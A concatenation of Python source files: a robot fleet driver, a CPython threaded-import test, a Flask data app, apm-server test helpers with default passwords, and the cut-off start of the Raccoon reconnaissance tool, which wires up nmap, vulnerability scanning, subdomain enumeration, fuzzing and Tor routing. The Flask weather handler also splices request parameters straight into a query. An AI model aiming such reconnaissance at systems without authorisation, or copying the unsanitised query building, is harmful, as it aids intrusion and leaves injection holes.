robot.positions[pos.name] = robot.api.positions_guid_get(
pos.guid)
count += 1
pos_dict = robot.api.positions_guid_get(pos.guid)
pos_dict = pos_dict.to_dict()
pos_dict['rmf_x'], pos_dict['rmf_y'] = self.mir2rmf_transform.transform(
[pos_dict['pos_x'], pos_dict['pos_y']])
big_dict.append(pos_dict)
json.dump(big_dict, f)
self.get_logger().info(f'updated {count} positions')
def create_all_api_clients(self, config):
# self.api_clients = []
for i in range(len(config['robots'])):
self.api_clients.append(self.create_single_api_client(config, i))
return self.api_clients
def create_single_api_client(self, config, idx):
robot_config = config['robots'][idx]
configuration = mir100_client.Configuration()
configuration.host = robot_config['base_url']
configuration.username = robot_config['user']
configuration.password = robot_config['password']
api_client = mir100_client.ApiClient(configuration)
api_client.default_headers['Accept-Language'] = 'en-US'
return api_client
def main():
parser = argparse.ArgumentParser()
parser.add_argument("fleet_config_file", nargs=1)
args = parser.parse_args()
with open(args.fleet_config_file[0], 'r') as f:
fleet_config = json.load(f)
rclpy.init()
node = FleetDriverMir(fleet_config)
rclpy.spin(node)
node.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main()
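# Illustrative sketch of the coordinate transforms used above (standalone
# example using the reference points from FleetDriverMir.__init__): nudged
# estimates a rigid transform between the two point sets, transform() maps a
# single [x, y] point, and get_rotation() returns the rotation in radians.
#
#     import nudged
#     rmf = [[26.95, -20.23], [29.26, -22.38], [11.4, -16.48], [12.46, -16.99]]
#     mir = [[7.2, 16.6], [5.15, 18.35], [23, 12.35], [22.05, 12.95]]
#     rmf2mir = nudged.estimate(rmf, mir)
#     x, y = rmf2mir.transform([26.95, -20.23])    # point in the MiR frame
#     yaw_offset = rmf2mir.get_rotation()          # added to the RMF yaw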
|
test_threaded_import.py
|
# This is a variant of the very old (early 90's) file
# Demo/threads/bug.py. It simply provokes a number of threads into
# trying to import the same module "at the same time".
# There are no pleasant failure modes -- most likely is that Python
# complains several times about module random having no attribute
# randrange, and then Python hangs.
import _imp as imp
import os
import importlib
import sys
import time
import shutil
import unittest
from unittest import mock
from test.support import (
verbose, import_module, run_unittest, TESTFN, reap_threads,
forget, unlink, rmtree, start_threads)
threading = import_module('threading')
def task(N, done, done_tasks, errors):
try:
# We don't use modulefinder but still import it in order to stress
# importing of different modules from several threads.
if len(done_tasks) % 2:
import modulefinder
import random
else:
import random
import modulefinder
# This will fail if random is not completely initialized
x = random.randrange(1, 3)
except Exception as e:
errors.append(e.with_traceback(None))
finally:
done_tasks.append(threading.get_ident())
finished = len(done_tasks) == N
if finished:
done.set()
def mock_register_at_fork(func):
# bpo-30599: Mock os.register_at_fork() when importing the random module,
# since this function doesn't allow to unregister callbacks and would leak
# memory.
return mock.patch('os.register_at_fork', create=True)(func)
# Create a circular import structure: A -> C -> B -> D -> A
# NOTE: `time` is already loaded and therefore doesn't threaten to deadlock.
circular_imports_modules = {
'A': """if 1:
import time
time.sleep(%(delay)s)
x = 'a'
import C
""",
'B': """if 1:
import time
time.sleep(%(delay)s)
x = 'b'
import D
""",
'C': """import B""",
'D': """import A""",
}
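# Why this layout can deadlock naive per-module import locks (illustrative
# timeline, assuming two threads start at roughly the same time):
#
#     thread 1: import A (holds A's lock) --sleep--> import C -> import B (waits for B)
#     thread 2: import B (holds B's lock) --sleep--> import D -> import A (waits for A)
#
# A correct implementation must detect the cycle and resolve it instead of
# blocking forever; see ThreadedImportTests.test_circular_imports below.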
class Finder:
"""A dummy finder to detect concurrent access to its find_spec()
method."""
def __init__(self):
self.numcalls = 0
self.x = 0
self.lock = threading.Lock()
def find_spec(self, name, path=None, target=None):
# Simulate some thread-unsafe behaviour. If calls to find_spec()
# are properly serialized, `x` will end up the same as `numcalls`.
# Otherwise not.
assert imp.lock_held()
with self.lock:
self.numcalls += 1
x = self.x
time.sleep(0.01)
self.x = x + 1
class FlushingFinder:
"""A dummy finder which flushes sys.path_importer_cache when it gets
called."""
def find_spec(self, name, path=None, target=None):
sys.path_importer_cache.clear()
class ThreadedImportTests(unittest.TestCase):
def setUp(self):
self.old_random = sys.modules.pop('random', None)
def tearDown(self):
# If the `random` module was already initialized, we restore the
# old module at the end so that pickling tests don't fail.
# See http://bugs.python.org/issue3657#msg110461
if self.old_random is not None:
sys.modules['random'] = self.old_random
@mock_register_at_fork
def check_parallel_module_init(self, mock_os):
if imp.lock_held():
# This triggers on, e.g., from test import autotest.
raise unittest.SkipTest("can't run when import lock is held")
done = threading.Event()
for N in (20, 50) * 3:
if verbose:
print("Trying", N, "threads ...", end=' ')
# Make sure that random and modulefinder get reimported freshly
for modname in ['random', 'modulefinder']:
try:
del sys.modules[modname]
except KeyError:
pass
errors = []
done_tasks = []
done.clear()
t0 = time.monotonic()
with start_threads(threading.Thread(target=task,
args=(N, done, done_tasks, errors,))
for i in range(N)):
pass
completed = done.wait(10 * 60)
dt = time.monotonic() - t0
if verbose:
print("%.1f ms" % (dt*1e3), flush=True, end=" ")
dbg_info = 'done: %s/%s' % (len(done_tasks), N)
self.assertFalse(errors, dbg_info)
self.assertTrue(completed, dbg_info)
if verbose:
print("OK.")
def test_parallel_module_init(self):
self.check_parallel_module_init()
def test_parallel_meta_path(self):
finder = Finder()
sys.meta_path.insert(0, finder)
try:
self.check_parallel_module_init()
self.assertGreater(finder.numcalls, 0)
self.assertEqual(finder.x, finder.numcalls)
finally:
sys.meta_path.remove(finder)
def test_parallel_path_hooks(self):
# Here the Finder instance is only used to check concurrent calls
# to path_hook().
finder = Finder()
# In order for our path hook to be called at each import, we need
# to flush the path_importer_cache, which we do by registering a
# dedicated meta_path entry.
flushing_finder = FlushingFinder()
def path_hook(path):
finder.find_spec('')
raise ImportError
sys.path_hooks.insert(0, path_hook)
sys.meta_path.append(flushing_finder)
try:
# Flush the cache a first time
flushing_finder.find_spec('')
numtests = self.check_parallel_module_init()
self.assertGreater(finder.numcalls, 0)
self.assertEqual(finder.x, finder.numcalls)
finally:
sys.meta_path.remove(flushing_finder)
sys.path_hooks.remove(path_hook)
def test_import_hangers(self):
# In case this test is run again, make sure the helper module
# gets loaded from scratch again.
try:
del sys.modules['test.threaded_import_hangers']
except KeyError:
pass
import test.threaded_import_hangers
self.assertFalse(test.threaded_import_hangers.errors)
def test_circular_imports(self):
# The goal of this test is to exercise implementations of the import
# lock which use a per-module lock, rather than a global lock.
# In these implementations, there is a possible deadlock with
# circular imports, for example:
# - thread 1 imports A (grabbing the lock for A) which imports B
# - thread 2 imports B (grabbing the lock for B) which imports A
# Such implementations should be able to detect such situations and
# resolve them one way or the other, without freezing.
# NOTE: our test constructs a slightly less trivial import cycle,
# in order to better stress the deadlock avoidance mechanism.
delay = 0.5
os.mkdir(TESTFN)
self.addCleanup(shutil.rmtree, TESTFN)
sys.path.insert(0, TESTFN)
self.addCleanup(sys.path.remove, TESTFN)
for name, contents in circular_imports_modules.items():
contents = contents % {'delay': delay}
with open(os.path.join(TESTFN, name + ".py"), "wb") as f:
f.write(contents.encode('utf-8'))
self.addCleanup(forget, name)
importlib.invalidate_caches()
results = []
def import_ab():
import A
results.append(getattr(A, 'x', None))
def import_ba():
import B
results.append(getattr(B, 'x', None))
t1 = threading.Thread(target=import_ab)
t2 = threading.Thread(target=import_ba)
t1.start()
t2.start()
t1.join()
t2.join()
self.assertEqual(set(results), {'a', 'b'})
@mock_register_at_fork
def test_side_effect_import(self, mock_os):
code = """if 1:
import threading
def target():
import random
t = threading.Thread(target=target)
t.start()
t.join()
t = None"""
sys.path.insert(0, os.curdir)
self.addCleanup(sys.path.remove, os.curdir)
filename = TESTFN + ".py"
with open(filename, "wb") as f:
f.write(code.encode('utf-8'))
self.addCleanup(unlink, filename)
self.addCleanup(forget, TESTFN)
self.addCleanup(rmtree, '__pycache__')
importlib.invalidate_caches()
__import__(TESTFN)
del sys.modules[TESTFN]
@reap_threads
def test_main():
old_switchinterval = None
try:
old_switchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-5)
except AttributeError:
pass
try:
run_unittest(ThreadedImportTests)
finally:
if old_switchinterval is not None:
sys.setswitchinterval(old_switchinterval)
if __name__ == "__main__":
test_main()
|
main.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Main entry module specified in app.yaml.
This module contains the request handler codes and the main app.
"""
import json
import logging
import os
import requests
import sys
import threading
import time
import flask
from flask import request
import services.datacommons as dc
from __init__ import create_app
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(levelname)s %(lineno)d : %(message)s')
app = create_app()
app.jinja_env.globals['GA_ACCOUNT'] = app.config['GA_ACCOUNT']
app.jinja_env.globals['FEEDING_AMERICA'] = app.config['FEEDING_AMERICA']
app.jinja_env.globals['SUSTAINABILITY'] = app.config['SUSTAINABILITY']
app.jinja_env.globals['NAME'] = app.config['NAME']
app.jinja_env.globals['BASE_HTML'] = (
'sustainability/base.html' if app.config['SUSTAINABILITY'] else 'base.html')
WARM_UP_ENDPOINTS = [
"/api/choropleth/geojson?placeDcid=country/USA&placeType=County",
"/api/place/parent/country/USA",
"/api/place/places-in-names?dcid=country/USA&placeType=County",
"/api/stats/set/series/within-place?parent_place=country/USA&child_type=County&stat_vars=Count_Person",
]
def send_warmup_requests():
logging.info("Sending warm up requests:")
for endpoint in WARM_UP_ENDPOINTS:
while True:
try:
resp = requests.get("http://127.0.0.1:8080" + endpoint)
if resp.status_code == 200:
break
except:
pass
time.sleep(1)
@app.before_request
def before_request():
scheme = request.headers.get('X-Forwarded-Proto')
if scheme and scheme == 'http' and request.url.startswith('http://'):
url = request.url.replace('http://', 'https://', 1)
code = 301
return flask.redirect(url, code=code)
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@app.route('/translator')
def translator_handler():
return flask.render_template('translator.html')
@app.route('/healthz')
def healthz():
return "very healthy"
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@app.route('/weather')
def get_weather():
dcid = request.args.get('dcid')
prop = request.args.get('prop')
period = request.args.get('period')
if not dcid:
flask.abort(400, 'Missing url parameter "dcid"')
if not prop:
flask.abort(400, 'Missing url parameter "prop"')
if not period:
flask.abort(400, 'Missing url parameter "period"')
query_string = ('SELECT ?date ?mean ?unit ?provId '
'WHERE {{'
' ?o typeOf {period}WeatherObservation .'
' ?o observedNode {dcid} .'
' ?o measuredProperty {prop} .'
' ?o observationDate ?date .'
' ?o unit ?unit .'
' ?o meanValue ?mean .'
' ?o provenance ?provId .}}').format(period=period,
dcid=dcid,
prop=prop)
_, rows = dc.query(query_string)
observations = []
for row in rows:
if ('value' not in row['cells'][0] or 'value' not in row['cells'][1] or
'value' not in row['cells'][2]):
continue
date = row['cells'][0]['value']
if date < '2000':
continue
text = 'mean {}: {} {}'.format(prop, row['cells'][1]['value'],
row['cells'][2]['value'])
observations.append({
'measuredProperty': prop,
'observationDate': date,
'meanValue': row['cells'][1]['value'],
'unit': row['cells'][2]['value'],
'text': text,
'provId': row['cells'][3]['value'],
})
return json.dumps(observations)
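# Illustrative example of the query produced above (assumed parameter values,
# shown reformatted for readability): for dcid="geoId/06", prop="temperature"
# and period="Daily", the handler issues roughly:
#
#     SELECT ?date ?mean ?unit ?provId WHERE {
#       ?o typeOf DailyWeatherObservation .
#       ?o observedNode geoId/06 .
#       ?o measuredProperty temperature .
#       ?o observationDate ?date .
#       ?o unit ?unit .
#       ?o meanValue ?mean .
#       ?o provenance ?provId .
#     }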
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@app.route('/mcf_playground')
def mcf_playground():
return flask.render_template('mcf_playground.html')
# TODO(shifucun): get branch cache version from mixer
@app.route('/version')
def version():
mixer_version = dc.version()
return flask.render_template('version.html',
website_hash=os.environ.get("WEBSITE_HASH"),
mixer_hash=mixer_version['gitHash'],
tables=mixer_version['tables'],
bigquery=mixer_version['bigQuery'])
if not (app.config["TEST"] or app.config["WEBDRIVER"] or app.config["LOCAL"]):
thread = threading.Thread(target=send_warmup_requests)
thread.start()
if __name__ == '__main__':
# This is used when running locally only. When deploying to GKE,
# a webserver process such as Gunicorn will serve the app.
logging.info("Run web server in local mode")
port = int(sys.argv[1]) if len(sys.argv) >= 2 else 8080
app.run(host='127.0.0.1', port=port, debug=True)
|
apmserver.py
|
from datetime import datetime, timedelta
import json
import os
import re
import shutil
import subprocess
import sys
import threading
import time
import unittest
from urllib.parse import urlparse
from elasticsearch import Elasticsearch, NotFoundError
import requests
# Add libbeat/tests/system to the import path.
output = subprocess.check_output(["go", "list", "-m", "-f", "{{.Path}} {{.Dir}}", "all"]).decode("utf-8")
beats_line = [line for line in output.splitlines() if line.startswith("github.com/snappyflow/beats/")][0]
beats_dir = beats_line.split(" ", 2)[1]
sys.path.append(os.path.join(beats_dir, 'libbeat', 'tests', 'system'))
from beat.beat import INTEGRATION_TESTS, TestCase, TimeoutError
from helper import wait_until
from es_helper import cleanup, default_pipelines
from es_helper import index_smap, index_span, index_error, apm_prefix
from kibana import Kibana
integration_test = unittest.skipUnless(INTEGRATION_TESTS, "integration test")
diagnostic_interval = float(os.environ.get('DIAGNOSTIC_INTERVAL', 0))
class BaseTest(TestCase):
maxDiff = None
def setUp(self):
super(BaseTest, self).setUp()
# TODO: move to Mixin and use only in tests where self.es is available
self.setup_diagnostics()
def setup_diagnostics(self):
if diagnostic_interval <= 0:
return
self.addCleanup(self.cleanup_diagnostics)
self.diagnostics_path = os.path.join(self.working_dir, "diagnostics")
os.makedirs(self.diagnostics_path)
self.running = True
self.diagnostic_thread = threading.Thread(
target=self.dump_diagnostics, kwargs=dict(interval=diagnostic_interval))
self.diagnostic_thread.daemon = True
self.diagnostic_thread.start()
def cleanup_diagnostics(self):
self.running = False
self.diagnostic_thread.join(timeout=30)
def dump_diagnostics(self, interval=2):
while self.running:
# TODO: use threading.Timer instead to not block tearDown
time.sleep(interval)
with open(os.path.join(self.diagnostics_path,
datetime.now().strftime("%Y%m%d_%H%M%S") + ".hot_threads"), mode="w") as out:
try:
out.write(self.es.nodes.hot_threads(threads=99999))
except Exception as e:
out.write("failed to query hot threads: {}\n".format(e))
with open(os.path.join(self.diagnostics_path,
datetime.now().strftime("%Y%m%d_%H%M%S") + ".tasks"), mode="w") as out:
try:
json.dump(self.es.tasks.list(), out, indent=True, sort_keys=True)
except Exception as e:
out.write("failed to query tasks: {}\n".format(e))
@classmethod
def setUpClass(cls):
cls.beat_name = "apm-server"
cls.beat_path = os.path.abspath(os.path.join(
os.path.dirname(__file__), "..", ".."))
cls.build_path = cls._beat_path_join("build", "system-tests")
super(BaseTest, cls).setUpClass()
@classmethod
def _beat_path_join(cls, *paths):
return os.path.abspath(os.path.join(cls.beat_path, *paths))
@staticmethod
def get_elasticsearch_url(user="", password=""):
"""
Returns an elasticsearch URL including username and password
"""
host = os.getenv("ES_HOST", "localhost")
if not user:
user = os.getenv("ES_USER", "apm_server_user")
if not password:
password = os.getenv("ES_PASS", "changeme")
if user and password:
host = user + ":" + password + "@" + host
return "http://{host}:{port}".format(
host=host,
port=os.getenv("ES_PORT", "9200"),
)
@staticmethod
def get_kibana_url(user="", password=""):
"""
Returns kibana URL including username and password
"""
host = os.getenv("KIBANA_HOST", "localhost")
if not user:
user = os.getenv("KIBANA_USER", "apm_user_ro")
if not password:
password = os.getenv("KIBANA_PASS", "changeme")
if user and password:
host = user + ":" + password + "@" + host
return "http://{host}:{port}".format(
host=host,
port=os.getenv("KIBANA_PORT", "5601"),
)
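# Example of the URL shape produced by the helpers above (the credentials
# shown are just the environment-variable defaults, not real secrets):
#
#     get_elasticsearch_url()  -> "http://apm_server_user:changeme@localhost:9200"
#     get_kibana_url()         -> "http://apm_user_ro:changeme@localhost:5601"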
def get_payload_path(self, name):
return self.get_testdata_path('intake-v2', name)
def get_testdata_path(self, *names):
return self._beat_path_join('testdata', *names)
def get_payload(self, name):
with open(self.get_payload_path(name)) as f:
return f.read()
def get_error_payload_path(self):
return self.get_payload_path("errors_2.ndjson")
def get_transaction_payload_path(self):
return self.get_payload_path("transactions.ndjson")
def get_metricset_payload_path(self):
return self.get_payload_path("metricsets.ndjson")
def get_event_payload(self, name="events.ndjson"):
return self.get_payload(name)
def ilm_index(self, index):
return "{}-000001".format(index)
class ServerBaseTest(BaseTest):
config_overrides = {}
host = "http://localhost:8200"
root_url = "{}/".format(host)
agent_config_url = "{}/{}".format(host, "config/v1/agents")
rum_agent_config_url = "{}/{}".format(host, "config/v1/rum/agents")
intake_url = "{}/{}".format(host, 'intake/v2/events')
rum_intake_url = "{}/{}".format(host, 'intake/v2/rum/events')
sourcemap_url = "{}/{}".format(host, 'assets/v1/sourcemaps')
expvar_url = "{}/{}".format(host, 'debug/vars')
jaeger_grpc_host = "localhost:14250"
jaeger_http_host = "localhost:14268"
jaeger_http_url = "http://{}/{}".format(jaeger_http_host, 'api/traces')
def config(self):
cfg = {"ssl_enabled": "false",
"queue_flush": 0,
"jaeger_grpc_enabled": "true",
"jaeger_grpc_host": self.jaeger_grpc_host,
"jaeger_http_enabled": "true",
"jaeger_http_host": self.jaeger_http_host,
"path": os.path.abspath(self.working_dir) + "/log/*"}
cfg.update(self.config_overrides)
return cfg
def setUp(self):
super(ServerBaseTest, self).setUp()
# Copy ingest pipeline definition to home directory of the test.
# The pipeline definition is expected to be at a specific location
# relative to the home dir. This ensures that the file can be loaded
# for all installations (deb, tar, ..).
pipeline_dir = os.path.join("ingest", "pipeline")
pipeline_def = os.path.join(pipeline_dir, "definition.json")
target_dir = os.path.join(self.working_dir, pipeline_dir)
if not os.path.exists(target_dir):
os.makedirs(target_dir)
shutil.copy(self._beat_path_join(pipeline_def), target_dir)
self.render_config_template(**self.config())
self.start_proc()
self.wait_until_started()
def start_proc(self):
self.apmserver_proc = self.start_beat(**self.start_args())
self.addCleanup(self.stop_proc)
def stop_proc(self):
self.apmserver_proc.check_kill_and_wait()
def start_args(self):
return {}
def wait_until_started(self):
wait_until(lambda: self.log_contains("Starting apm-server"), name="apm-server started")
def assert_no_logged_warnings(self, suppress=None):
"""
Assert that the log file contains no ERR or WARN lines.
"""
if suppress is None:
suppress = []
# Jenkins runs as a Windows service and when Jenkins executes these
# tests the Beat is confused since it thinks it is running as a service.
winErr = "ERR Error: The service process could not connect to the service controller."
corsWarn = "WARN\t.*CORS related setting .* Consider more restrictive setting for production use."
suppress = suppress + ["WARN EXPERIMENTAL", "WARN BETA", "WARN.*deprecated", winErr, corsWarn]
log = self.get_log()
for s in suppress:
log = re.sub(s, "", log)
self.assertNotRegex(log, "ERR|WARN")
def request_intake(self, data=None, url=None, headers=None):
if not url:
url = self.intake_url
if data is None:
data = self.get_event_payload()
if headers is None:
headers = {'content-type': 'application/x-ndjson'}
return requests.post(url, data=data, headers=headers)
class ElasticTest(ServerBaseTest):
skip_clean_pipelines = False
def config(self):
cfg = super(ElasticTest, self).config()
cfg.update({
"elasticsearch_host": self.get_elasticsearch_url(),
"file_enabled": "false",
"kibana_enabled": "false",
})
cfg.update(self.config_overrides)
return cfg
def setUp(self):
admin_user = os.getenv("ES_SUPERUSER_USER", "admin")
admin_password = os.getenv("ES_SUPERUSER_PASS", "changeme")
self.admin_es = Elasticsearch([self.get_elasticsearch_url(admin_user, admin_password)])
self.es = Elasticsearch([self.get_elasticsearch_url()])
self.kibana = Kibana(self.get_kibana_url())
delete_pipelines = [] if self.skip_clean_pipelines else default_pipelines
cleanup(self.admin_es, delete_pipelines=delete_pipelines)
self.kibana.delete_all_agent_config()
super(ElasticTest, self).setUp()
# try to make sure APM Server is fully up
self.wait_until_ilm_logged()
self.wait_until_pipeline_logged()
def wait_until_ilm_logged(self):
setup_enabled = self.config().get("ilm_setup_enabled")
msg = "Finished index management setup." if setup_enabled != "false" else "Manage ILM setup is disabled."
wait_until(lambda: self.log_contains(msg), name="ILM setup")
def wait_until_pipeline_logged(self):
registration_enabled = self.config().get("register_pipeline_enabled")
msg = "Registered Ingest Pipelines successfully" if registration_enabled != "false" else "No pipeline callback registered"
wait_until(lambda: self.log_contains(msg), name="pipelines registration")
def load_docs_with_template(self, data_path, url, endpoint, expected_events_count,
query_index=None, max_timeout=10, extra_headers=None, file_mode="rb"):
if query_index is None:
query_index = apm_prefix
headers = {'content-type': 'application/x-ndjson'}
if extra_headers:
headers.update(extra_headers)
with open(data_path, file_mode) as f:
r = requests.post(url, data=f, headers=headers)
assert r.status_code == 202, r.status_code
# Wait to give documents some time to be sent to the index
self.wait_for_events(endpoint, expected_events_count, index=query_index, max_timeout=max_timeout)
def wait_for_events(self, processor_name, expected_count, index=None, max_timeout=10):
"""
wait_for_events waits for an expected number of event docs with the given
'processor.name' value, and returns the hits when found.
"""
if index is None:
index = apm_prefix
query = {"term": {"processor.name": processor_name}}
result = {} # TODO(axw) use "nonlocal" when we migrate to Python 3
def get_docs():
hits = self.es.search(index=index, body={"query": query})['hits']
result['docs'] = hits['hits']
return hits['total']['value'] == expected_count
wait_until(get_docs,
max_timeout=max_timeout,
name="{} documents to reach {}".format(processor_name, expected_count),
)
return result['docs']
def check_backend_error_sourcemap(self, index, count=1):
rs = self.es.search(index=index, params={"rest_total_hits_as_int": "true"})
assert rs['hits']['total'] == count, "found {} documents, expected {}".format(
rs['hits']['total'], count)
for doc in rs['hits']['hits']:
err = doc["_source"]["error"]
for exception in err.get("exception", []):
self.check_for_no_smap(exception)
if "log" in err:
self.check_for_no_smap(err["log"])
def check_backend_span_sourcemap(self, count=1):
rs = self.es.search(index=index_span, params={"rest_total_hits_as_int": "true"})
assert rs['hits']['total'] == count, "found {} documents, expected {}".format(
rs['hits']['total'], count)
for doc in rs['hits']['hits']:
self.check_for_no_smap(doc["_source"]["span"])
def check_for_no_smap(self, doc):
if "stacktrace" not in doc:
return
for frame in doc["stacktrace"]:
assert "sourcemap" not in frame, frame
def logged_requests(self, url="/intake/v2/events"):
for line in self.get_log_lines():
jline = json.loads(line)
u = urlparse(jline.get("URL", ""))
if jline.get("logger") == "request" and u.path == url:
yield jline
def approve_docs(self, base_path, received):
"""
approve_docs compares the received documents to those contained
in the file at ${base_path}.approved.json. If that file does not
exist, then it is considered equivalent to a lack of documents.
Only the document _source is compared, and we ignore differences
in some context-sensitive fields such as the "observer", which
may vary between test runs.
"""
base_path = self._beat_path_join(os.path.dirname(__file__), base_path)
approved_path = base_path + '.approved.json'
received_path = base_path + '.received.json'
try:
with open(approved_path) as f:
approved = json.load(f)
except IOError:
approved = []
# get_doc_id returns a value suitable for sorting and identifying
# documents: either a unique ID, or a timestamp. This is necessary
# since not all event types require a unique ID (namely, errors do
# not.)
#
# We return (0, doc['error']['id']) when the event type is 'error'
# if that field exists, otherwise returns (1, doc['@timestamp']).
# The first tuple element exists to sort IDs before timestamps.
def get_doc_id(doc):
doc_type = doc['processor']['event']
if 'id' in doc.get(doc_type, {}):
return (0, doc[doc_type]['id'])
if doc_type == 'metric' and 'transaction' in doc:
transaction = doc['transaction']
if 'histogram' in transaction.get('duration', {}):
# Transaction histogram documents are published periodically
# by the apm-server, so we cannot use the timestamp. Instead,
# use the transaction name, type, and result (a subset of the
# full aggregation key, but good enough for our tests).
fields = [transaction.get(field, '') for field in ('type', 'name', 'result')]
return (1, '_'.join(fields))
return (2, doc['@timestamp'])
received = [doc['_source'] for doc in received]
received.sort(key=get_doc_id)
try:
for rec in received:
# Overwrite received observer values with the approved ones,
# in order to avoid noise in the 'approvals' diff if there are
# any other changes.
#
# We don't compare the observer values between received/approved,
# as they are dependent on the environment.
rec_id = get_doc_id(rec)
rec_observer = rec['observer']
self.assertEqual(set(rec_observer.keys()), set(
["hostname", "version", "id", "ephemeral_id", "type", "version_major"]))
assert rec_observer["version"].startswith(str(rec_observer["version_major"]) + ".")
for appr in approved:
if get_doc_id(appr) == rec_id:
rec['observer'] = appr['observer']
# ensure both docs have the same event keys set
self.assertEqual(rec.get("event", {}).keys(), appr.get("event", {}).keys())
# We don't compare the event values between received/approved
# as they are dependent on the environment.
if 'event' in rec:
rec['event'] = appr['event']
break
assert len(received) == len(approved)
for i, rec in enumerate(received):
appr = approved[i]
rec_id = get_doc_id(rec)
assert rec_id == get_doc_id(appr), "New entry with id {}".format(rec_id)
for k, v in rec.items():
self.assertEqual(v, appr[k])
except Exception as exc:
with open(received_path, 'w') as f:
json.dump(received, f, indent=4, separators=(',', ': '), sort_keys=True)
# Create a dynamic Exception subclass so we can fake its name to look like the original exception.
class ApprovalException(Exception):
def __init__(self, cause):
super(ApprovalException, self).__init__(cause.args)
def __str__(self):
return "{}\n\nReceived data differs from approved data. Run 'make update check-approvals' to verify the diff.".format(self.args)
ApprovalException.__name__ = type(exc).__name__
raise ApprovalException(exc).with_traceback(sys.exc_info()[2])
class ClientSideBaseTest(ServerBaseTest):
sourcemap_url = 'http://localhost:8200/assets/v1/sourcemaps'
intake_url = 'http://localhost:8200/intake/v2/rum/events'
backend_intake_url = 'http://localhost:8200/intake/v2/events'
config_overrides = {}
def config(self):
cfg = super(ClientSideBaseTest, self).config()
cfg.update({"enable_rum": "true",
"kibana_enabled": "false",
"smap_cache_expiration": "200"})
cfg.update(self.config_overrides)
return cfg
def get_backend_error_payload_path(self, name="errors_2.ndjson"):
return super(ClientSideBaseTest, self).get_payload_path(name)
def get_backend_transaction_payload_path(self, name="transactions_spans.ndjson"):
return super(ClientSideBaseTest, self).get_payload_path(name)
def get_error_payload_path(self, name="errors_rum.ndjson"):
return super(ClientSideBaseTest, self).get_payload_path(name)
def get_transaction_payload_path(self, name="transactions_spans_rum_2.ndjson"):
return super(ClientSideBaseTest, self).get_payload_path(name)
class ClientSideElasticTest(ClientSideBaseTest, ElasticTest):
def check_rum_error_sourcemap(self, updated, expected_err=None, count=1):
rs = self.es.search(index=index_error, params={"rest_total_hits_as_int": "true"})
assert rs['hits']['total'] == count, "found {} documents, expected {}".format(
rs['hits']['total'], count)
for doc in rs['hits']['hits']:
err = doc["_source"]["error"]
for exception in err.get("exception", []):
self.check_smap(exception, updated, expected_err)
if "log" in err:
self.check_smap(err["log"], updated, expected_err)
def check_rum_transaction_sourcemap(self, updated, expected_err=None, count=1):
rs = self.es.search(index=index_span, params={"rest_total_hits_as_int": "true"})
assert rs['hits']['total'] == count, "found {} documents, expected {}".format(
rs['hits']['total'], count)
for doc in rs['hits']['hits']:
span = doc["_source"]["span"]
self.check_smap(span, updated, expected_err)
@staticmethod
def check_smap(doc, updated, err=None):
if "stacktrace" not in doc:
return
for frame in doc["stacktrace"]:
smap = frame["sourcemap"]
if err is None:
assert 'error' not in smap
else:
assert err in smap["error"]
assert smap["updated"] == updated
class CorsBaseTest(ClientSideBaseTest):
def config(self):
cfg = super(CorsBaseTest, self).config()
cfg.update({"allow_origins": ["http://www.elastic.co"]})
return cfg
class ExpvarBaseTest(ServerBaseTest):
config_overrides = {}
def config(self):
cfg = super(ExpvarBaseTest, self).config()
cfg.update(self.config_overrides)
return cfg
def get_debug_vars(self):
return requests.get(self.expvar_url)
class SubCommandTest(ServerBaseTest):
config_overrides = {}
def config(self):
cfg = super(SubCommandTest, self).config()
cfg.update({
"elasticsearch_host": self.get_elasticsearch_url(),
"file_enabled": "false",
})
cfg.update(self.config_overrides)
return cfg
def wait_until_started(self):
self.apmserver_proc.check_wait()
# command and go test output is combined in log, pull out the command output
log = self.get_log()
pos = -1
for _ in range(2):
# export always uses \n, not os.linesep
pos = log[:pos].rfind("\n")
self.command_output = log[:pos]
for trimmed in log[pos:].strip().splitlines():
# ensure only skipping expected lines
assert trimmed.split(None, 1)[0] in ("PASS", "coverage:"), trimmed
def stop_proc(self):
return
class ProcStartupFailureTest(ServerBaseTest):
def stop_proc(self):
try:
self.apmserver_proc.kill_and_wait()
        except Exception:
self.apmserver_proc.wait()
def wait_until_started(self):
return
|
main.py
|
import time
import asyncio
import threading
import click
import os
from raccoon_src.utils.coloring import COLOR, COLORED_COMBOS
from raccoon_src.utils.exceptions import RaccoonException, HostHandlerException
from raccoon_src.utils.request_handler import RequestHandler
from raccoon_src.utils.logger import SystemOutLogger
from raccoon_src.utils.help_utils import HelpUtilities
from raccoon_src.lib.fuzzer import URLFuzzer
from raccoon_src.lib.host import Host
from raccoon_src.lib.scanner import Scanner, NmapScan, NmapVulnersScan, VulnersScanner
from raccoon_src.lib.sub_domain import SubDomainEnumerator
from raccoon_src.lib.dns_handler import DNSHandler
from raccoon_src.lib.waf import WAF
from raccoon_src.lib.tls import TLSHandler
from raccoon_src.lib.web_app import WebApplicationScanner
# Set path for relative access to builtin files.
MY_PATH = os.path.abspath(os.path.dirname(__file__))
def intro(logger):
logger.info("""{}
_____ _____ _____ ____ ____ _ _
| __ \ /\ / ____| / ____| / __ \ / __ \ | \ | |
| |__) | / \ | | | | | | | | | | | | | \| |
| _ / / /\ \ | | | | | | | | | | | | | . ` |
| | \ \ / ____ \ | |____ | |____ | |__| | | |__| | | |\ |
|_| \_\ /_/ \_\ \_____| \_____| \____/ \____/ |_| \_|
{}
4841434b414c4c5448455448494e4753
https://github.com/evyatarmeged/Raccoon
-------------------------------------------------------------------
""".format(COLOR.GRAY, COLOR.RESET))
@click.command()
@click.version_option("0.8.5")
@click.argument("target")
@click.option("-d", "--dns-records", default="A,MX,NS,CNAME,SOA,TXT",
help="Comma separated DNS records to query. Defaults to: A,MX,NS,CNAME,SOA,TXT")
@click.option("--tor-routing", is_flag=True, help="Route HTTP traffic through Tor (uses port 9050)."
" Slows total runtime significantly")
@click.option("--proxy-list", help="Path to proxy list file that would be used for routing HTTP traffic."
